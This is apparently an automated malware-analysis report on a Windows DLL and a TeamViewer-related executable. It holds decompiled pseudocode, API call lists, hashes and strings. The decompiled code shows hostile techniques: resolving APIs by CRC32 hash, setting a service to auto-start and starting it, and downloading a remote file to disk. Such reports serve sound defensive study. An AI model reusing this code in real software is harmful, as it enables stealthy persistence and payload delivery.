                                                                                                                        					 *(_t116 + 0x1c) = _t89;
                                                                                                                        					 *(_t116 + 0xc) = 0;
                                                                                                                        					if( *((intOrPtr*)(_t78 + 0x18)) <= 0) {
                                                                                                                        						L27:
                                                                                                                        						return _t58;
                                                                                                                        					}
                                                                                                                        					while(1) {
                                                                                                                        						_t106 =  *((intOrPtr*)(_t89 +  *(_t116 + 0x14) * 4)) + _t101;
                                                                                                                        						_t60 = RtlComputeCrc32(0, _t106, lstrlenA(_t106));
                                                                                                                        						_t96 =  *(_t116 + 0x50);
                                                                                                                        						_t61 = _t60 ^  *(_t116 + 0x54);
                                                                                                                        						_t112 = 0;
                                                                                                                        						if(_t96 <= 0) {
                                                                                                                        							goto L25;
                                                                                                                        						}
                                                                                                                        						_t90 =  *((intOrPtr*)(_t116 + 0x4c));
                                                                                                                        						while(_t61 !=  *_t90) {
                                                                                                                        							_t112 = _t112 + 1;
                                                                                                                        							_t90 = _t90 + 0x10;
                                                                                                                        							if(_t112 < _t96) {
                                                                                                                        								continue;
                                                                                                                        							}
                                                                                                                        							goto L25;
                                                                                                                        						}
                                                                                                                        						_t103 =  *((intOrPtr*)( *((intOrPtr*)(_t116 + 0x2c)) + ( *( *((intOrPtr*)(_t116 + 0x28)) +  *(_t116 + 0x14) * 2) & 0x0000ffff) * 4)) +  *((intOrPtr*)(_t116 + 0x48));
                                                                                                                        						 *((intOrPtr*)(_t116 + 0x10)) = _t112;
                                                                                                                        						if(_t103 == 0 || _t103 < _t78 || _t103 >=  *((intOrPtr*)( *((intOrPtr*)(_t116 + 0x30)) + 0x7c)) + _t78) {
                                                                                                                        							L22:
                                                                                                                        							 *( *((intOrPtr*)(_t116 + 0x4c)) + 0xc + (_t112 + _t112) * 8) = _t103;
                                                                                                                        							_t101 =  *((intOrPtr*)(_t116 + 0x48));
                                                                                                                        							if(_t103 == 0) {
                                                                                                                        								 *(_t116 + 0x20) = 0;
                                                                                                                        							}
                                                                                                                        						} else {
                                                                                                                        							_t80 = StrDupA(_t103);
                                                                                                                        							if(_t80 == 0) {
                                                                                                                        								L24:
                                                                                                                        								_t78 =  *(_t116 + 0x1c);
                                                                                                                        								_t101 =  *((intOrPtr*)(_t116 + 0x48));
                                                                                                                        								goto L25;
                                                                                                                        							}
                                                                                                                        							 *(_t116 + 0x20) = 0;
                                                                                                                        							_t108 = StrChrA(_t80, 0x2e);
                                                                                                                        							if(_t108 == 0) {
                                                                                                                        								L20:
                                                                                                                        								LocalFree(_t80);
                                                                                                                        								if( *((intOrPtr*)(_t116 + 0x18)) == 0) {
                                                                                                                        									goto L24;
                                                                                                                        								}
                                                                                                                        								_t78 =  *(_t116 + 0x1c);
                                                                                                                        								goto L22;
                                                                                                                        							}
                                                                                                                        							 *_t108 = 0;
                                                                                                                        							_t109 = _t108 + 1;
                                                                                                                        							_t115 = GetModuleHandleA(_t80);
                                                                                                                        							if(_t115 != 0) {
                                                                                                                        								L18:
                                                                                                                        								 *(_t116 + 0x1c) = 1;
                                                                                                                        								_t72 = RtlComputeCrc32(0, _t109, lstrlenA(_t109));
                                                                                                                        								_t73 =  *(_t116 + 0x54);
                                                                                                                        								_push(_t73);
                                                                                                                        								_push(0x10);
                                                                                                                        								_push(_t116 + 0x3c);
                                                                                                                        								_push(_t115);
                                                                                                                        								 *(_t116 + 0x44) = _t72 ^ _t73;
                                                                                                                        								 *((intOrPtr*)(_t116 + 0x48)) = 0;
                                                                                                                        								 *((intOrPtr*)(_t116 + 0x4c)) = 0;
                                                                                                                        								 *(_t116 + 0x50) = 0;
                                                                                                                        								E6F331DB0();
                                                                                                                        								_t103 =  *(_t116 + 0x50);
                                                                                                                        								_t116 = _t116 + 0x10;
                                                                                                                        								L19:
                                                                                                                        								_t112 =  *((intOrPtr*)(_t116 + 0x10));
                                                                                                                        								goto L20;
                                                                                                                        							}
                                                                                                                        							_t115 = LoadLibraryA(_t80);
                                                                                                                        							if(_t115 == 0) {
                                                                                                                        								goto L19;
                                                                                                                        							}
                                                                                                                        							goto L18;
                                                                                                                        						}
                                                                                                                        						L25:
                                                                                                                        						_t63 =  *(_t116 + 0x14) + 1;
                                                                                                                        						 *(_t116 + 0x14) = _t63;
                                                                                                                        						if(_t63 <  *((intOrPtr*)(_t78 + 0x18))) {
                                                                                                                        							_t89 =  *(_t116 + 0x24);
                                                                                                                        							continue;
                                                                                                                        						}
                                                                                                                        						_t58 =  *(_t116 + 0x20);
                                                                                                                        						goto L27;
                                                                                                                        					}
                                                                                                                        				}
                                                                                                                        			}


                                                                                                                        APIs
                                                                                                                        • lstrlenA.KERNEL32(00000000,00000000), ref: 6F331E3E
                                                                                                                        • RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 6F331E48
                                                                                                                        • StrDupA.SHLWAPI(?,00000000,00000000,00000000), ref: 6F331EAF
                                                                                                                        • StrChrA.SHLWAPI(?,?,00000000,0000002E), ref: 6F331ECA
                                                                                                                        • GetModuleHandleA.KERNEL32(00000000,?,?,00000000,0000002E), ref: 6F331EDB
                                                                                                                        • LoadLibraryA.KERNEL32(00000000,?,?,00000000,0000002E), ref: 6F331EE8
                                                                                                                        • lstrlenA.KERNEL32(00000001,?,?,00000000,0000002E), ref: 6F331EFD
                                                                                                                        • RtlComputeCrc32.NTDLL(00000000,00000001,00000000), ref: 6F331F08
                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,00000000,0000002E), ref: 6F331F3F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: ComputeCrc32lstrlen$FreeHandleLibraryLoadLocalModule
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1770823755-0
                                                                                                                        • Opcode ID: e1719bb1d2010f95499b823d1ed3a48d1804b073bf590fab8e68cad7c2022153
                                                                                                                        • Instruction ID: 65e8725b82402b4f01efe4d29028d19829b0407ec8df8c8736d513323c304720
                                                                                                                        • Opcode Fuzzy Hash: e1719bb1d2010f95499b823d1ed3a48d1804b073bf590fab8e68cad7c2022153
                                                                                                                        • Instruction Fuzzy Hash: 4E5157729083958FC710EF58C880A5BB7FABF89708F044A1DF99597341D7B2E8158BA2
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F3337D0(int _a4, char** _a8, int _a12) {
                                                                                                                        				intOrPtr _v24;
                                                                                                                        				struct _SERVICE_STATUS _v28;
                                                                                                                        				int _t14;
                                                                                                                        				long _t18;
                                                                                                                        				int _t26;
                                                                                                                        				void* _t31;
                                                                                                                        				void* _t33;
                                                                                                                        
                                                                                                                        				_t31 = _a4;
                                                                                                                        				if(_t31 == 0) {
                                                                                                                        					return 0;
                                                                                                                        				} else {
                                                                                                                        					_a4 = 0;
                                                                                                                        					if(QueryServiceConfigA(_t31, 0, 0,  &_a4) != 0) {
                                                                                                                        						_t18 = _a4;
                                                                                                                        						_t26 = _t18;
                                                                                                                        						_t33 = HeapAlloc(GetProcessHeap(), 8, _t18);
                                                                                                                        						if(_t33 != 0) {
                                                                                                                        							if(QueryServiceConfigA(_t31, _t33, _t26,  &_a4) != 0 &&  *((intOrPtr*)(_t33 + 4)) != 2) {
                                                                                                                        								ChangeServiceConfigA(_t31, 0xffffffff, 2, 0xffffffff, 0, 0, 0, 0, 0, 0, 0);
                                                                                                                        							}
                                                                                                                        							HeapFree(GetProcessHeap(), 0, _t33);
                                                                                                                        						}
                                                                                                                        					}
                                                                                                                        					_t14 = QueryServiceStatus(_t31,  &_v28);
                                                                                                                        					if(_v24 != 4 || _t14 == 0) {
                                                                                                                        						StartServiceA(_t31, _a12, _a8);
                                                                                                                        					}
                                                                                                                        					return 1;
                                                                                                                        				}
                                                                                                                        			}











                                                                                                                        APIs
                                                                                                                        • QueryServiceConfigA.ADVAPI32 ref: 6F3337F9
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,00000000,00000000), ref: 6F33380A
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 6F333811
                                                                                                                        • QueryServiceConfigA.ADVAPI32(?,00000000,?,?), ref: 6F333825
                                                                                                                        • ChangeServiceConfigA.ADVAPI32(?,000000FF,00000002,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6F333846
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 6F33384F
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F333856
                                                                                                                        • QueryServiceStatus.ADVAPI32(?,?), ref: 6F333864
                                                                                                                        • StartServiceA.ADVAPI32(?,?,?), ref: 6F333881
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: Service$Heap$ConfigQuery$Process$AllocChangeFreeStartStatus
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1115209516-0
                                                                                                                        • Opcode ID: 316321dbec79f1ad0a06c4a981634d515364f495dcd244e94ef274cd30321a77
                                                                                                                        • Instruction ID: 6b9c217e72629dd9ae21a3bc7e989c57eb31603a4ef8cae699d9587f01e7282d
                                                                                                                        • Opcode Fuzzy Hash: 316321dbec79f1ad0a06c4a981634d515364f495dcd244e94ef274cd30321a77
                                                                                                                        • Instruction Fuzzy Hash: 3511DF32604754BBE620DA648C4AFBB7BBDEF85B70F40861DF519DA180D732E8158B62
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004E1AB8
                                                                                                                          • Part of subcall function 004A1B0C: __EH_prolog3.LIBCMT ref: 004A1B13
                                                                                                                          • Part of subcall function 004A1B0C: InitializeCriticalSection.KERNEL32(?,00000004,004B59A0,00747890,00000000), ref: 004A1B28
                                                                                                                          • Part of subcall function 0050E96A: __EH_prolog3.LIBCMT ref: 0050E971
                                                                                                                          • Part of subcall function 004A17BA: __EH_prolog3.LIBCMT ref: 004A17C1
                                                                                                                          • Part of subcall function 004A17BA: DeleteCriticalSection.KERNEL32(?,00000004,004BE908,000001F8,?,?,?,0044D2A4,00000002), ref: 004A17DC
                                                                                                                          • Part of subcall function 004BF3A9: __EH_prolog3.LIBCMT ref: 004BF3CB
                                                                                                                          • Part of subcall function 004B94E7: __EH_prolog3.LIBCMT ref: 004B94F5
                                                                                                                          • Part of subcall function 004E177C: __EH_prolog3.LIBCMT ref: 004E179B
                                                                                                                          • Part of subcall function 004E177C: GetModuleFileNameW.KERNEL32(00000000,?,00000104,0000000C), ref: 004E17CE
                                                                                                                          • Part of subcall function 004E177C: PathRemoveFileSpecW.SHLWAPI(?), ref: 004E17DB
                                                                                                                          • Part of subcall function 004E177C: _wcscat_s.LIBCMT ref: 004E17FA
                                                                                                                          • Part of subcall function 004E177C: _memset.LIBCMT ref: 004E1818
                                                                                                                          • Part of subcall function 004E177C: GetPrivateProfileStringW.KERNEL32(Installation,INSTEXE,0077C1F8,?,00000100,?), ref: 004E183F
                                                                                                                          • Part of subcall function 004A17E8: __EH_prolog3.LIBCMT ref: 004A17EF
                                                                                                                          • Part of subcall function 004A17E8: InitializeCriticalSection.KERNEL32(?,00000004,0044D1D9,00000000), ref: 004A1804
                                                                                                                          • Part of subcall function 004C125C: __EH_prolog3.LIBCMT ref: 004C1263
                                                                                                                          • Part of subcall function 004C1A4B: __EH_prolog3.LIBCMT ref: 004C1A52
                                                                                                                          • Part of subcall function 0040D53A: char_traits.LIBCPMT ref: 0040D55F
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3$CriticalSection$FileInitialize$DeleteModuleNamePathPrivateProfileRemoveSpecString_memset_wcscat_schar_traits
                                                                                                                        • String ID: - $ExeInfo$MAC$MC.Reg $MC.Register.Failed$Reg
                                                                                                                        • API String ID: 2142787985-157867029
                                                                                                                        • Opcode ID: 4f02a14d7a071371db4ec4a1477779f4146960cec998739b188ed06e7634775f
                                                                                                                        • Instruction ID: 931cd102a136e8241c5f311e7206260e69e1ff52e66e5f491b3fa25d9f698058
                                                                                                                        • Opcode Fuzzy Hash: 4f02a14d7a071371db4ec4a1477779f4146960cec998739b188ed06e7634775f
                                                                                                                        • Instruction Fuzzy Hash: 1412E27080118CEADB11EBA4CD95FED7BB8AF22308F14819EF40667192DB781F48DB65
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004BE340
                                                                                                                          • Part of subcall function 004A1784: __EH_prolog3.LIBCMT ref: 004A178B
                                                                                                                          • Part of subcall function 004A1784: InitializeCriticalSection.KERNEL32(?,00000004,004BE363,000001F8,?,?,?,0044D2A4,00000002), ref: 004A17A0
                                                                                                                        • GetLastError.KERNEL32(00000000,0077C1F8,00000000,000001F8,?,?,?,0044D2A4,00000002), ref: 004BE3D3
                                                                                                                        • SetLastError.KERNEL32(00000000,00000002,, LE=,00000000,?,?,?,0044D2A4,00000002), ref: 004BE44C
                                                                                                                          • Part of subcall function 004A1B0C: __EH_prolog3.LIBCMT ref: 004A1B13
                                                                                                                          • Part of subcall function 004A1B0C: InitializeCriticalSection.KERNEL32(?,00000004,004B59A0,00747890,00000000), ref: 004A1B28
                                                                                                                          • Part of subcall function 004FB756: __EH_prolog3_GS.LIBCMT ref: 004FB75D
                                                                                                                          • Part of subcall function 004FB756: _memset.LIBCMT ref: 004FB785
                                                                                                                          • Part of subcall function 004FB756: inet_ntoa.WS2_32(?), ref: 004FB797
                                                                                                                          • Part of subcall function 004A18A4: __EH_prolog3_GS.LIBCMT ref: 004A18AB
                                                                                                                          • Part of subcall function 004A18A4: InitializeCriticalSection.KERNEL32(?,00000028,0044D275,00747890,00000000,?,00000000), ref: 004A18C0
                                                                                                                          • Part of subcall function 004A18A4: _swprintf.LIBCMT ref: 004A18DE
                                                                                                                          • Part of subcall function 004A17E8: __EH_prolog3.LIBCMT ref: 004A17EF
                                                                                                                          • Part of subcall function 004A17E8: InitializeCriticalSection.KERNEL32(?,00000004,0044D1D9,00000000), ref: 004A1804
                                                                                                                          • Part of subcall function 004A346F: __EH_prolog3.LIBCMT ref: 004A3476
                                                                                                                          • Part of subcall function 004B934F: __EH_prolog3.LIBCMT ref: 004B9356
                                                                                                                          • Part of subcall function 004B934F: GetCurrentThreadId.KERNEL32 ref: 004B9361
                                                                                                                          • Part of subcall function 004B8C51: __EH_prolog3.LIBCMT ref: 004B8C5F
                                                                                                                          • Part of subcall function 004B8C51: GetLocalTime.KERNEL32(?,000001B0), ref: 004B8C70
                                                                                                                          • Part of subcall function 004A2E7D: __EH_prolog3.LIBCMT ref: 004A2E84
                                                                                                                          • Part of subcall function 004BD9DE: __EH_prolog3.LIBCMT ref: 004BD9E9
                                                                                                                          • Part of subcall function 004A17BA: __EH_prolog3.LIBCMT ref: 004A17C1
                                                                                                                          • Part of subcall function 004A17BA: DeleteCriticalSection.KERNEL32(?,00000004,004BE908,000001F8,?,?,?,0044D2A4,00000002), ref: 004A17DC
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3$CriticalSection$Initialize$ErrorH_prolog3_Last$CurrentDeleteLocalThreadTime_memset_swprintfinet_ntoa
                                                                                                                        • String ID: $ - $!!!$, LE=
                                                                                                                        • API String ID: 2606616901-592451786
                                                                                                                        • Opcode ID: f022c455c5764106f36873342652e9d3e01d78ef86a039732b7f07f6e76c7f19
                                                                                                                        • Instruction ID: cfd9aa10e2b141b9e46a9bef141b9343a0bcda9aa8dfee9726bdeb6a5042fb4b
                                                                                                                        • Opcode Fuzzy Hash: f022c455c5764106f36873342652e9d3e01d78ef86a039732b7f07f6e76c7f19
                                                                                                                        • Instruction Fuzzy Hash: DA02D47080518CEADB11EB64CD55BDEBB78AF32308F0480DEE44667292DB781F48DB66
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • TlsGetValue.KERNEL32(00000032,2F9F5BE6,?,?,?,?,?,00000000,00646158,000000FF,00527677), ref: 005274C3
                                                                                                                        • TlsSetValue.KERNEL32(00000032,00000000), ref: 00527507
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00527532
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 00527539
                                                                                                                        • GetProcessHeap.KERNEL32(00000000), ref: 0052757A
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 00527581
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 00527586
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 0052758D
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 005275EE
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 005275F5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$FreeProcess$Value
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3709577838-0
                                                                                                                        • Opcode ID: 983a5a466bb6b14d7caf5d2e96df46036674bca2aba397b0b748a8dd607ceb6f
                                                                                                                        • Instruction ID: efe23618da7be0be714c2defb54dae9868633af632c0532a4d351959e9289117
                                                                                                                        • Opcode Fuzzy Hash: 983a5a466bb6b14d7caf5d2e96df46036674bca2aba397b0b748a8dd607ceb6f
                                                                                                                        • Instruction Fuzzy Hash: 3E417E706047249FDB24DF28E884F26FBA4FF8A721F14861CE5168B6D0CB74E945CB91
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004BD9E9
                                                                                                                        • _fseek.LIBCMT ref: 004BDA6D
                                                                                                                        • _ftell.LIBCMT ref: 004BDA75
                                                                                                                        • DeleteFileW.KERNEL32(?,?,TeamViewer5_Logfile_OLD.log,00000000,?,TeamViewer5_Logfile.log,00000000,?,?,?,?,00000000,00000001,00000048), ref: 004BDAF8
                                                                                                                        • MoveFileW.KERNEL32(?,?), ref: 004BDB04
                                                                                                                          • Part of subcall function 004A213A: __EH_prolog3.LIBCMT ref: 004A2141
                                                                                                                          • Part of subcall function 004A213A: EnterCriticalSection.KERNEL32(?,00000008,004A18F3,00000000,00000000), ref: 004A214F
                                                                                                                          • Part of subcall function 004A213A: LeaveCriticalSection.KERNEL32(?), ref: 004A2169
                                                                                                                        Strings
                                                                                                                        • TeamViewer5_Logfile.log, xrefs: 004BDA92
                                                                                                                        • TeamViewer5_Logfile_OLD.log, xrefs: 004BDAC7
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalFileH_prolog3Section$DeleteEnterLeaveMove_fseek_ftell
                                                                                                                        • String ID: TeamViewer5_Logfile.log$TeamViewer5_Logfile_OLD.log
                                                                                                                        • API String ID: 3462555429-3326806432
                                                                                                                        • Opcode ID: 266f837de3019583d8310fb42b51e15f4c67de9f91ae1b29e7f4c831333e8170
                                                                                                                        • Instruction ID: 941d454ff430ebb6e774a2b5fbba032a6fb3ccfc5e9e5ea10176e806666df5fc
                                                                                                                        • Opcode Fuzzy Hash: 266f837de3019583d8310fb42b51e15f4c67de9f91ae1b29e7f4c831333e8170
                                                                                                                        • Instruction Fuzzy Hash: 3751C871804248EFDB05EFA4CD46EDD7BA4AF25304F4480AEF50657192EB78AF08D755
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004C82A4
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 004C82D1
                                                                                                                        • RevertToSelf.ADVAPI32(?,0083E5AC,?,?), ref: 004C8329
                                                                                                                          • Part of subcall function 004A1B0C: __EH_prolog3.LIBCMT ref: 004A1B13
                                                                                                                          • Part of subcall function 004A1B0C: InitializeCriticalSection.KERNEL32(?,00000004,004B59A0,00747890,00000000), ref: 004A1B28
                                                                                                                          • Part of subcall function 004378AA: __EH_prolog3.LIBCMT ref: 004378B1
                                                                                                                        • GetLastError.KERNEL32(00000000,?,00000064,004C57DB), ref: 004C83AB
                                                                                                                        • CloseHandle.KERNEL32(00000001,?,00000064,004C57DB), ref: 004C841B
                                                                                                                        Strings
                                                                                                                        • ImpersonateUser: RevertToSelf failed, xrefs: 004C833D
                                                                                                                        • ImpersonateUser: UnLoadUserProfile failed with error , xrefs: 004C83BF
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3$CloseCriticalCurrentErrorHandleInitializeLastRevertSectionSelfThread
                                                                                                                        • String ID: ImpersonateUser: RevertToSelf failed$ImpersonateUser: UnLoadUserProfile failed with error
                                                                                                                        • API String ID: 3949952964-1656220962
                                                                                                                        • Opcode ID: 61ed9c508e954f94765a574add5277df479cf33997a966e780dbf8020bcd8da0
                                                                                                                        • Instruction ID: c5a483f6a84fb0c669df827afa7862ad503414c6e7d590abcc356b186abaa6fe
                                                                                                                        • Opcode Fuzzy Hash: 61ed9c508e954f94765a574add5277df479cf33997a966e780dbf8020bcd8da0
                                                                                                                        • Instruction Fuzzy Hash: 7751E471C00289DEDB25EFA4CD55AEEBBB4BF14304F14446EE042632A2EB395A04CB59
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 82%
                                                                                                                        			E6F333180(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                        				signed int _t21;
                                                                                                                        				void* _t22;
                                                                                                                        
                                                                                                                        				_t21 = 0;
                                                                                                                        				_t22 = HeapAlloc(GetProcessHeap(), 8, 0x800);
                                                                                                                        				if(_t22 != 0) {
                                                                                                                        					_t21 = RtlComputeCrc32(0, _t22, wsprintfA(_t22, "%s%s%s%c", _a4, _a8, _a12, 2)) % 0xffffff7f;
                                                                                                                        					asm("bswap edi");
                                                                                                                        					HeapFree(GetProcessHeap(), 0, _t22);
                                                                                                                        				}
                                                                                                                        				return _t21;
                                                                                                                        			}






                                                                                                                        APIs
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000800), ref: 6F333192
                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 6F333195
                                                                                                                        • wsprintfA.USER32 ref: 6F3331B8
                                                                                                                        • RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 6F3331C4
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 6F3331D9
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 6F3331DC
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$Process$AllocComputeCrc32Freewsprintf
                                                                                                                        • String ID: %s%s%s%c
                                                                                                                        • API String ID: 3834306679-489954935
                                                                                                                        • Opcode ID: 126a114c3c73674c5551a03df936bf17308c36b037e18daf4ccad612da5fa3cc
                                                                                                                        • Instruction ID: ae3b06c34e2ca5a5d7f77b5956ace44fa511404ae0d515e7e5a597a12bec6c51
                                                                                                                        • Opcode Fuzzy Hash: 126a114c3c73674c5551a03df936bf17308c36b037e18daf4ccad612da5fa3cc
                                                                                                                        • Instruction Fuzzy Hash: DCF090B7B416A42BE624D6258C8DE7B769EEFC9661F008118FA18D7280CA64DC1286B5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 100%
                                                                                                                        			E6F335A00() {
                                                                                                                        				char* _v16;
                                                                                                                        				CHAR* _v36;
                                                                                                                        				void* _v1048;
                                                                                                                        				void _v1068;
                                                                                                                        				long _v1076;
                                                                                                                        				long _v1080;
                                                                                                                        				void _v1084;
                                                                                                                        				void* _v1088;
                                                                                                                        				long _v1092;
                                                                                                                        				long _v1096;
                                                                                                                        				char* _t13;
                                                                                                                        				long _t23;
                                                                                                                        				void* _t27;
                                                                                                                        				long _t33;
                                                                                                                        				void* _t36;
                                                                                                                        				void* _t38;
                                                                                                                        
                                                                                                                        				_t13 = M6F340518; // 0x749bb0
                                                                                                                        				_t33 = 0;
                                                                                                                        				_t38 = InternetOpenA(_t13, 0, 0, 0, 0);
                                                                                                                        				_v1048 = _t38;
                                                                                                                        				if(_t38 != 0) {
                                                                                                                        					_t27 = InternetOpenUrlA(_t38, _v16, 0, 0, 0x846a0000, 0);
                                                                                                                        					if(_t27 != 0) {
                                                                                                                        						_t36 = CreateFileA(_v36, 0x40000000, 0, 0, 2, 0x80, 0);
                                                                                                                        						if(_t36 != 0xffffffff) {
                                                                                                                        							_v1080 = 0;
                                                                                                                        							_v1076 = 0;
                                                                                                                        							do {
                                                                                                                        								if(InternetReadFile(_t27,  &_v1068, 0x400,  &_v1080) == 0) {
                                                                                                                        									goto L7;
                                                                                                                        								} else {
                                                                                                                        									_t23 = _v1096;
                                                                                                                        									if(_t23 != 0) {
                                                                                                                        										WriteFile(_t36,  &_v1084, _t23,  &_v1092, 0);
                                                                                                                        										goto L7;
                                                                                                                        									}
                                                                                                                        								}
                                                                                                                        								break;
                                                                                                                        								L7:
                                                                                                                        							} while (_v1096 > 0);
                                                                                                                        							_t33 = 1;
                                                                                                                        							CloseHandle(_t36);
                                                                                                                        							_t38 = _v1088;
                                                                                                                        						}
                                                                                                                        						InternetCloseHandle(_t27);
                                                                                                                        					}
                                                                                                                        					InternetCloseHandle(_t38);
                                                                                                                        				}
                                                                                                                        				return _t33;
                                                                                                                        			}




















                                                                                                                        APIs
                                                                                                                        • InternetOpenA.WININET(00749BB0,00000000,00000000,00000000,00000000), ref: 6F335A14
                                                                                                                        • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,846A0000,00000000), ref: 6F335A3A
                                                                                                                        • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000), ref: 6F335A62
                                                                                                                        • InternetReadFile.WININET(00000000,?,00000400,?), ref: 6F335A93
                                                                                                                        • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 6F335AAF
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 6F335ABE
                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 6F335AC9
                                                                                                                        • InternetCloseHandle.WININET(00000000), ref: 6F335AD1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp
                                                                                                                        Similarity
                                                                                                                        • API ID: Internet$CloseFileHandle$Open$CreateReadWrite
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2705228764-0
                                                                                                                        • Opcode ID: 5cd404f22b3cd12ddc7d7577c1f9aabfb786d46380eccbe6a4ff4290f236b758
                                                                                                                        • Instruction ID: 52941c637d6536255a51803a9143df598c2cda5ccb6e77c6c0afdcd6468fd4c2
                                                                                                                        • Opcode Fuzzy Hash: 5cd404f22b3cd12ddc7d7577c1f9aabfb786d46380eccbe6a4ff4290f236b758
                                                                                                                        • Instruction Fuzzy Hash: CA21B372500789ABD320DE25CC88FAB7BACEBCA720F00091DFA1592141D771E915C7B1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        C-Code - Quality: 70%
                                                                                                                        			E6F333B60(intOrPtr* _a8) {
                                                                                                                        				struct _SERVICE_STATUS* _v4;
                                                                                                                        				int _v8;
                                                                                                                        				CHAR* _t9;
                                                                                                                        				int _t10;
                                                                                                                        				void* _t13;
                                                                                                                        				int _t14;
                                                                                                                        				signed int _t18;
                                                                                                                        				short* _t20;
                                                                                                                        				int _t21;
                                                                                                                        				void _t22;
                                                                                                                        				void* _t23;
                                                                                                                        				void* _t26;
                                                                                                                        				intOrPtr* _t27;
                                                                                                                        				void* _t30;
